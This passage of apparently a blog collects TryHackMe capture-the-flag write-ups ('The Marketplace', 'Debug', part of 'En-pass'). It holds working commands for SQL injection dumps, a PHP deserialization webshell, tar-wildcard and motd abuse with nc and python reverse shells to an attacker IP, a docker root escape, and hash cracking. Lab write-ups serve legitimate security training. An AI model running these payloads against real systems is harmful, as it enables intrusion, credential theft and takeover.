Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost:3000/item/5
Accept-Encoding: gzip, deflate
Accept-Language: en-US

Now, browse the /admin location, intercept the request in Burp Suite and replace the token with the one from the admin:

GET /admin HTTP/1.1
Host: 10.10.4.48
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig
Upgrade-Insecure-Requests: 1

We are now connected as admin:

Flag: THM{c37a63895910e478f28669b048c348d5}

What is flag 2? (User.txt)

SQLi vulnerability

Analyzing the user listing, we notice that all links have the following form: http://10.10.4.48/admin?user=1

Replacing the numerical ID with a quote sign will trigger the following error:

Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to
use near ''' at line 1

Exploit the SQL injection

I failed to use sqlmap, as it failed with a 403 error code each time. Let’s try the manual way:

Database and tables

Database identification:

$ curl -s --cookie "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig" \
http://10.10.4.48/admin?user=`urlencode "0 UNION SELECT 1,database(),3,4"` | tail

      User 1
      
          User marketplace 

          ID: 1 

          Is administrator: true

Database: marketplace

Tables identification

$ curl -s --cookie "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig" \
http://10.10.4.48/admin?user=`urlencode "0 UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema='marketplace'"` | tail 

      User 1
      
          User items,messages,users 

          ID: 1 

          Is administrator: true

Tables: items, messages, users

Users table

Users table columns

$ curl -s --cookie "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig" \
http://10.10.4.48/admin?user=`urlencode "0 UNION SELECT 1,GROUP_CONCAT(column_name),3,4 FROM information_schema.columns WHERE table_schema='marketplace' AND table_name='users'"` | tail

      User 1
      
          User id,isAdministrator,password,username 

          ID: 1 

          Is administrator: true

Users table columns:

id
isAdministrator
password
username

Dump users table

Usernames:

└─$ curl -s --cookie "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig" \
http://10.10.4.48/admin?user=`urlencode "0 UNION SELECT 1,GROUP_CONCAT(username),3,4 FROM marketplace.users"` | tail

      User 1
      
          User jake,michael,system,test 

          ID: 1 

          Is administrator: true

Passwords:

$ curl -s --cookie "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig" \
http://10.10.4.48/admin?user=`urlencode "0 UNION SELECT 1,GROUP_CONCAT(password),3,4 FROM marketplace.users"` | tail

      User 1
      
          User $2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW,$2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q,$2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG,$2b$10$oX4eZCpFWnJV0Xj.OemYqOy4RAepVk.Tu56TvYqB/FpPEOKf00tOC 

          ID: 1 

          Is administrator: true

I tried to brute force the following hashes, but it failed:

jake:$2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW
michael:$2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q
system:$2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG
test:$2b$10$oX4eZCpFWnJV0Xj.OemYqOy4RAepVk.Tu56TvYqB/FpPEOKf00tOC

Messages table

Messages table columns

$ curl -s --cookie "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig" \
http://10.10.4.48/admin?user=`urlencode "0 UNION SELECT 1,GROUP_CONCAT(column_name),3,4 FROM information_schema.columns WHERE table_schema='marketplace' AND table_name='messages'"` | tail

      User 1
      
          User id,is_read,message_content,user_from,user_to 

          ID: 1 

          Is administrator: true

Dump the messages

$ curl -s --cookie "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig" \
http://10.10.4.48/admin?user=`urlencode "0 UNION SELECT 1,GROUP_CONCAT(message_content),3,4 FROM marketplace.messages"` | tail
      
          User Hello!
An automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password.
Your new password is: @b_ENXkGYUCAv3zJ,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have reviewed the listing and found nothing that violates our rules.,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers. 

          ID: 1 

          Is administrator: true

We have a password: @b_ENXkGYUCAv3zJ

Connect as jake

We can now connect as jake with the password found just above against the SSH service.

jake@the-marketplace:~$ cat user.txt 
THM{c3648ee7af1369676e3e4b15da6dc0b4}

What is flag 3? (Root.txt)

Lateral move (jake -> michael)

Checking the other users reveals that it may be interesting to move to michael, as he his in a docker group:

jake@the-marketplace:~/tmp$ id michael
uid=1002(michael) gid=1002(michael) groups=1002(michael),999(docker)

Searching for files owned by michael will reveal an interesting backup.sh script:

jake@the-marketplace:/home/marketplace$ find / -type f -user michael -exec ls -l {} + 2>/dev/null
-rw-r--r-- 1 michael michael  220 Aug 23  2020 /home/michael/.bash_logout
-rw-r--r-- 1 michael michael 3771 Aug 23  2020 /home/michael/.bashrc
-rw-r--r-- 1 michael michael  807 Aug 23  2020 /home/michael/.profile
-rwxr-xr-x 1 michael michael   73 Aug 23  2020 /opt/backups/backup.sh

This script compresses files using tar and a wildcard. Checking on GTFOBins, we know we can exploit this.

jake@the-marketplace:/home/marketplace$ cat /opt/backups/backup.sh 
#!/bin/bash
echo "Backing up files...";
tar cf /opt/backups/backup.tar *

Checking our privileges will reveal that we can run this backup script as michael without password:

jake@the-marketplace:~$ sudo -l
Matching Defaults entries for jake on the-marketplace:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on the-marketplace:
    (michael) NOPASSWD: /opt/backups/backup.sh

Start a listener (nc -nlvp 4444) and run the following commands on the target:

jake@the-marketplace:~$ cat > /opt/backups/shell.sh << EOF
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.50.72 4444 >/tmp/f
EOF
jake@the-marketplace:~$ chmod +x /opt/backups/shell.sh
jake@the-marketplace:~$ touch "/opt/backups/--checkpoint=1"
jake@the-marketplace:~$ touch "/opt/backups/--checkpoint-action=exec=sh shell.sh"
jake@the-marketplace:~$ cd /opt/backups/
jake@the-marketplace:~$ sudo -u michael /opt/backups/backup.sh

On the listener, a shell is now spawned, and we are now connected as michael:

┌──(kali㉿kali)-[/data/The_Marketplace/files]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.4.48] 46366
michael@the-marketplace:/opt/backups$ id
id
uid=1002(michael) gid=1002(michael) groups=1002(michael),999(docker)

docker

Listing the images, we see that alpine is available:

michael@the-marketplace:/opt/backups$ docker image ls
docker image ls
REPOSITORY                   TAG                 IMAGE ID            CREATED             SIZE
themarketplace_marketplace   latest              6e3d8ac63c27        8 months ago        2.16GB
nginx                        latest              4bb46517cac3        9 months ago        133MB
node                         lts-buster          9c4cc2688584        9 months ago        886MB
mysql                        latest              0d64f46acfd1        9 months ago        544MB
alpine                       latest              a24bb4013296        11 months ago       5.57MB

Checking on GTFOBins, we see that we can exploit it to gain a root shell:

michael@the-marketplace:/opt/backups$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
michael@the-marketplace:/opt/backups$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
t /mnt shn -v /:/mnt --rm -it alpine chroot
# id
id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)

Root flag

# cat /root/root.txt 
cat /root/root.txt
THM{d4f76179c80c0dcf46e0f8e43c9abd62}

TryHackMe > Debug

Thu, 20 May 2021 16:13:00 +0000

Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization!

User flag

Open ports

Nmap reveals 2 open ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
|   256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_  256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web enumeration

Gobuster reveals a hidden /backup folder:

┌──(kali㉿kali)-[/data/Debug]
└─$ gobuster dir -u http://10.10.196.165 -x php,txt,bak,old,htm,html,zip,tar -w /usr/share/wordlists/dirb/common.txt

[REDACTED]

/backup               (Status: 301) [Size: 315] [--> http://10.10.196.165/backup/]
/grid                 (Status: 301) [Size: 313] [--> http://10.10.196.165/grid/]  
/index.html           (Status: 200) [Size: 11321]                                 
/index.php            (Status: 200) [Size: 5732]                                  
/index.php            (Status: 200) [Size: 5732]                                  
/index.html           (Status: 200) [Size: 11321]                                 
/javascripts          (Status: 301) [Size: 320] [--> http://10.10.196.165/javascripts/]
/javascript           (Status: 301) [Size: 319] [--> http://10.10.196.165/javascript/] 
/message.txt          (Status: 200) [Size: 282]                                        
/server-status        (Status: 403) [Size: 278]                                        
                                                                                       
===============================================================
2021/05/19 15:51:08 Finished
===============================================================

The index.php.bak file

Browsing this directory in a browser will show several files, one of which being a backup of index.php.

┌──(kali㉿kali)-[/data/Debug/files]
└─$ curl -s http://10.10.196.165/backup/index.php.bak



  
  Base
  
  
  






[REDACTED]


  
    
      Form Submit (Your message will be saved on the server and will be reviewed later by our administrators)
      
        Field Name
        
      
      
        Email Field
        
      
      
        Textarea
        
      


[REDACTED]


      
        
        
      
    
  



class FormSubmit {

  public $form_file = 'message.txt';
  public $message = '';

  public function SaveMessage() {

    $NameArea = $_GET['name']; 
    $EmailArea = $_GET['email'];
    $TextArea = $_GET['comments'];

    $this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

  }

  public function __destruct() {

    file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
    echo 'Your submission has been successfully saved!';

  }

}

// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application -> SaveMessage();


?>


[REDACTED]

What is interesting in this code is that the __destruct function of the FormSubmit class is creating the file mentionned in the $form_file variable, with the content of the $message variable.

However, there is a hidden debug parameter in the code, which is passed to the unserialize function, which we can abuse, as shown below.

PHP serialization exploit

As explained by OWASP, “since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope”. This is explained here: https://notsosecure.com/remote-code-execution-via-php-unserialize/.

Let’s first create the following PHP code:

┌──(kali㉿kali)-[/data/Debug/files]
└─$ cat shell.php

class FormSubmit {
  public $form_file = 'shell.php';
  public $message = '&1|nc 10.8.50.72 4444 >/tmp/f"); ?>';
}
$oForm = new FormSubmit;
echo urlencode(serialize($oForm));
?>

Now, let’s pass the resulting payload to the debug variable of the index.php page. It will create a shell.php file on the server, with the content we put in the $message variable.

┌──(kali㉿kali)-[/data/Debug/files]
└─$ curl -s http://10.10.196.165/index.php?debug=`php shell.php`

Now, start a listener (nc -nlvp 4444) and browse shell.php:

┌──(kali㉿kali)-[/data/Debug/files]
└─$ curl -s http://10.10.196.165/shell.php

James password

We now have a reverse shell. We can’t access james’ home folder to get the user flag. But analyzing the files in the web directory shows a .htpasswd file, with a hash, which may be james’ password.

www-data@osboxes:/var/www/html$ cat .htpasswd
cat .htpasswd
james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1

Let’s crack the hash:

┌──(kali㉿kali)-[/data/Debug/files]
└─$ /data/src/john/run/john james.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jamaica          (james)
1g 0:00:00:00 DONE (2021-05-20 14:58) 50.00g/s 38400p/s 38400c/s 38400C/s evelyn..james1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

User flag

We can now connect as james via SSH directly, with the password jamaica. Let’s get the user flag

james@osboxes:~$ cat user.txt
7e37c84a66cc40b1c6bf700d08d28c20

User flag: 7e37c84a66cc40b1c6bf700d08d28c20

Root flag

Message from root

It seems that root has left a message to james:

james@osboxes:~$ cat Note-To-James.txt 
Dear James,

As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it? 

But there's still one thing I'd like you to do, before the submission.

Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D

I gave you access to modify all these files :) 

Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!

Best Regards,

root

The motd service

There are several ways to make this banner. Let’s have a look at files we can modify in /etc/:

james@osboxes:~$ find /etc -type f -writable -exec ls -l {} + 2>/dev/null
-rwxrwxr-x 1 root james 1220 Mar 10 18:32 /etc/update-motd.d/00-header
-rwxrwxr-x 1 root james    0 Mar 10 18:38 /etc/update-motd.d/00-header.save
-rwxrwxr-x 1 root james 1157 Jun 14  2016 /etc/update-motd.d/10-help-text
-rwxrwxr-x 1 root james   97 Dec  7  2018 /etc/update-motd.d/90-updates-available
-rwxrwxr-x 1 root james  299 Jul 22  2016 /etc/update-motd.d/91-release-upgrade
-rwxrwxr-x 1 root james  142 Dec  7  2018 /etc/update-motd.d/98-fsck-at-reboot
-rwxrwxr-x 1 root james  144 Dec  7  2018 /etc/update-motd.d/98-reboot-required
-rwxrwxr-x 1 root james  604 Nov  5  2017 /etc/update-motd.d/99-esm

The motd service (Message of the Day) is used to display messages when a user connects, and will be run by root. As we have write access, we can add a reverse shell command:

james@osboxes:~$ cat >> /etc/update-motd.d/00-header << EOF
> /usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
> EOF

Reverse shell and root flag

Now, start a listener (nc -nlvp 4444), disconnect from the SSH session and reconnect. A root shell is spawned to the listener window.

┌──(kali㉿kali)-[/data/Debug/files]
└─$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.196.165] 59084
bash: cannot set terminal process group (1373): Inappropriate ioctl for device
bash: no job control in this shell
root@osboxes:/# cat /root/root.txt
cat /root/root.txt
3c8c3d0fe758c320d158e32f68fabf4b

Root flag: 3c8c3d0fe758c320d158e32f68fabf4b

TryHackMe > En-pass

Sun, 16 May 2021 21:07:00 +0000

Get what you can’t.

Think-out-of-the-box

Name The Path.

Nmap detects 2 open ports:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:bf:6b:1e:93:71:7c:99:04:59:d3:8d:81:04:af:46 (RSA)
|   256 40:fd:0c:fc:0b:a8:f5:2d:b1:2e:34:81:e5:c7:a5:91 (ECDSA)
|_  256 7b:39:97:f0:6c:8a:ba:38:5f:48:7b:cc:da:72:a8:44 (ED25519)
8001/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: En-Pass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration (1st level)

A first enumeration of the web server will reveal several resources:

┌──(kali㉿kali)-[/data/En-pass/files]
└─$ gobuster dir -u http://10.10.67.150:8001/ -x php,txt,old,bak,zip,tar -w /usr/share/wordlists/dirb/common.txt

[REDACTED]

/403.php              (Status: 403) [Size: 1123]
/index.html           (Status: 200) [Size: 2563]
/reg.php              (Status: 200) [Size: 2417]
/server-status        (Status: 403) [Size: 279] 
/web                  (Status: 301) [Size: 317] [--> http://10.10.67.150:8001/web/]
/zip                  (Status: 301) [Size: 317] [--> http://10.10.67.150:8001/zip/]
                                                                                   
===============================================================
2021/05/12 16:38:07 Finished
===============================================================

The zip directory

This directory is a rabbit hole. You’ll get several zip archives that all contain the same useless information: a file containing the string sadman. I initially thought it could be a username, but it doesn’t lead anywhere.

The web directory

Enumerating the /web directory reveals a subdirectory:

┌──(kali㉿kali)-[/data/En-pass/files]
└─$ gobuster dir -u http://10.10.67.150:8001/web/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.67.150:8001/web/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/12 15:40:56 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/resources            (Status: 301) [Size: 327] [--> http://10.10.67.150:8001/web/resources/]
                                                                                             
===============================================================
2021/05/12 15:42:17 Finished
===============================================================

Continuing with enumerations of the subdirectories leads to http://10.10.67.150:8001/web/resources/infoseek/configure/key:

┌──(kali㉿kali)-[/data/En-pass/files]
└─$ gobuster dir -u http://10.10.67.150:8001/web/resources/infoseek/configure/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.67.150:8001/web/resources/infoseek/configure/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/12 15:56:06 Starting gobuster in directory enumeration mode
===============================================================
/key                  (Status: 200) [Size: 1766]
Progress: 2119 / 220561 (0.96%)                ^C
[!] Keyboard interrupt detected, terminating.
                                                
===============================================================
2021/05/12 15:56:38 Finished
===============================================================

Answer: /web/resources/infoseek/configure/key

What is the user flag?

Hint: The path you get will forbid to see but you can bypass it.

SSH private key

The file is a SSH private key.

$ chmod 600 key
$ ssh -i key sadman@10.10.67.150

It’s password protected, and John fails to crack the password.

┌──(kali㉿kali)-[/data/En-pass/files]
└─$ /data/src/john/run/ssh2john.py key > ssh.hash                                                             130 ⨯
zsh: no such file or directory: /data/src/john/run/ssh2john.py
                                                                                                                    
┌──(kali㉿kali)-[/data/En-pass/files]
└─$ /data/src/john/run/ssh2john.py key > ssh.hash                                                             127 ⨯
                                                                                                                    
┌──(kali㉿kali)-[/data/En-pass/files]
└─$ /data/src/john/run/john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:05 DONE (2021-05-12 16:02) 0g/s 2716Kp/s 2716Kc/s 2716KC/sa6_123..*7¡Vamos!

The reg.php page

Let’s continue with the other resources found previously. The /reg.php page is a challenge, and the PHP source code is actually revealed:

┌──(kali㉿kali)-[/data/En-pass/files]
└─$ curl -s http://10.10.67.150:8001/reg.php | tr -s '\n'                                                       1 ⨯





En-Pass

[REDACTED]




EN-PASS

  
   
    
   
    
 
     
if($_SERVER["REQUEST_METHOD"] == "POST"){
   $title = $_POST["title"];
   if (!preg_match('/[a-zA-Z0-9]/i' , $title )){
          
          $val = explode(",",$title);
          $sum = 0;
          
          for($i = 0 ; $i < 9; $i++){
                if ( (strlen($val[0]) == 2) and (strlen($val[8]) ==  3 ))  {
                    if ( $val[5] !=$val[8]  and $val[3]!=$val[7] ) 
            
                        $sum = $sum+ (bool)$val[$i]."
"; 
                }
          
          
          }
          if ( ($sum) == 9 ){
            
              echo $result;//do not worry you'll get what you need.
              echo " Congo You Got It !! Nice ";
        
            
            }
            
                    else{
                      echo "  Try Try!!";
                
                    }
          }
        
          else{
            echo "  Try Again!! ";
      
          }     
 
  }
 
?>

There are a couple of tests to pass. After debugging in a sandbox, I eventually found a valid string: ##,??,??,##,??,#,??,#,###

┌──(kali㉿kali)-[/data/En-pass]
└─$ curl -s -XPOST -d "title=##,??,??,##,??,#,??,#,###" http://10.10.67.150:8001/reg.php | grep Nice
              echo " Congo You Got It !! Nice ";
Nice. Password : cimihan_are_you_here?

403 Fuzzing

At this stage, we have the password for the SSH private key, but no valid user. As the hint says The path you get will forbid to see but you can bypass it, I thought of the last resource we have: the 403.php page. After some searches on the Internet to bypass 403 pages, you’ll eventually find this fuzzing tool.

Open BurpSuite and run 403fuzzer:

┌──(kali㉿kali)-[/data/src/403fuzzer]
└─$ python3 403fuzzer.py -u http://10.10.67.150:8001/403.php -hc 403,404 --proxy http://localhost:8080

Sending header payloads...

Proxy flag was detected. Skipping trailing dot payload...

Sending URL payloads...
Response Code: 200  Length: 2563  Payload: /#403.php
Response Code: 200  Length: 2563  Payload: /#?403.php
Response Code: 400  Length: 306 Payload: /%2e%2e/403.php
Response Code: 200  Length: 2563  Payload: /#403.php
Response Code: 400  Length: 306 Payload: /%2e%2e/403.php
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /403.php%3b/%2e.
Response Code: 200  Length: 2563  Payload: /403.php%3b/..
Response Code: 200  Length: 2563  Payload: /403.php/%2e%2e
Response Code: 200  Length: 2563  Payload: /403.php/%2e%2e/
Response Code: 200  Length: 2563  Payload: /403.php/..
Response Code: 200  Length: 2563  Payload: /403.php/../
Response Code: 200  Length: 2563  Payload: /403.php/../../
Response Code: 200  Length: 2563  Payload: /403.php/../../../
Response Code: 200  Length: 2563  Payload: /403.php/../../..//
Response Code: 200  Length: 2563  Payload: /403.php/../..//
Response Code: 200  Length: 2563  Payload: /403.php/../..//../
Response Code: 200  Length: 2563  Payload: /403.php/.././../
Response Code: 200  Length: 2563  Payload: /403.php/../.;/../
Response Code: 200  Length: 2563  Payload: /403.php/..//
Response Code: 200  Length: 2563  Payload: /403.php/..//../
Response Code: 200  Length: 2563  Payload: /403.php/..//../../
Response Code: 200  Length: 2563  Payload: /403.php/../;/../
Response Code: 200  Length: 917 Payload: /403.php/..;/ <------------------ interesting
Response Code: 200  Length: 917 Payload: /403.php/..;//../
Response Code: 200  Length: 2563  Payload: /403.php//../../
Response Code: 200  Length: 2563  Payload: /403.php;%2f%2f/../
Response Code: 200  Length: 2563  Payload: /403.php;%2f..%2f/../
Response Code: 200  Length: 2563  Payload: /403.php;/%2e%2e
Response Code: 200  Length: 2563  Payload: /403.php;/%2e%2e/
Response Code: 200  Length: 2563  Payload: /403.php;/%2e.
Response Code: 200  Length: 2563  Payload: /403.php;/.%2e
Response Code: 200  Length: 2563  Payload: /403.php;/..
Response Code: 200  Length: 2563  Payload: /403.php;/../
Response Code: 200  Length: 2563  Payload: /403.php;/../../
Response Code: 200  Length: 2563  Payload: /403.php;/../..//
Response Code: 200  Length: 2563  Payload: /403.php;/.././../
Response Code: 200  Length: 2563  Payload: /403.php;/../.;/../
Response Code: 200  Length: 2563  Payload: /403.php;/..//
Response Code: 400  Length: 306 Payload: /403.php;/..//%2e%2e/
Response Code: 200  Length: 2563  Payload: /403.php;/..//../
Response Code: 200  Length: 2563  Payload: /403.php;/..///
Response Code: 200  Length: 2563  Payload: /403.php;/../;/../
Response Code: 200  Length: 2563  Payload: /403.php;/..
Response Code: 200  Length: 2563  Payload: /403.php;//../../
Response Code: 400  Length: 306 Payload: /;/..//%2e%2e/403.php
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /#403.php
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response code: 200   Response length: 0           Sent OPTIONS method. 

Response length was 0 so probably NOT worth checking out....

Response Headers: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 0

Cycling in BurpSuite through the requests with a 200 HTTP code, we eventually find the good one:

GET /403.php/..;/ HTTP/1.1
Host: 10.10.67.150:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

Which generated the below response:

HTTP/1.1 200 OK
Date: Wed, 12 May 2021 17:07:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 917
Connection: close
Content-Type: text/html; charset=UTF-8




    
    
    En-Pass

[REDACTED]

Glad to see you here.Congo, you bypassed it. 'imsau' is waiting for you somewhere.

SSH Connection

We now have all information to connect to the SSH service:

Username: imsau
Passphrase: cimihan_are_you_here?

┌──(kali㉿kali)-[/data/En-pass/files]
└─$ ssh -i key imsau@10.10.67.150
Enter passphrase for key 'key': cimihan_are_you_here?
$ cat user.txt  
1c5ccb6ce6f3561e302e0e516c633da9

User flag: 1c5ccb6ce6f3561e302e0e516c633da9

What is the root flag?

Cronjob

Running linpeas.sh won’t really be helpful. Running pspy64 will reveal a cronjob run by root every minute:

2021/05/12 19:02:01 CMD: UID=0    PID=22837  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22836  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22835  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22834  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22833  | /usr/sbin/CRON -f 
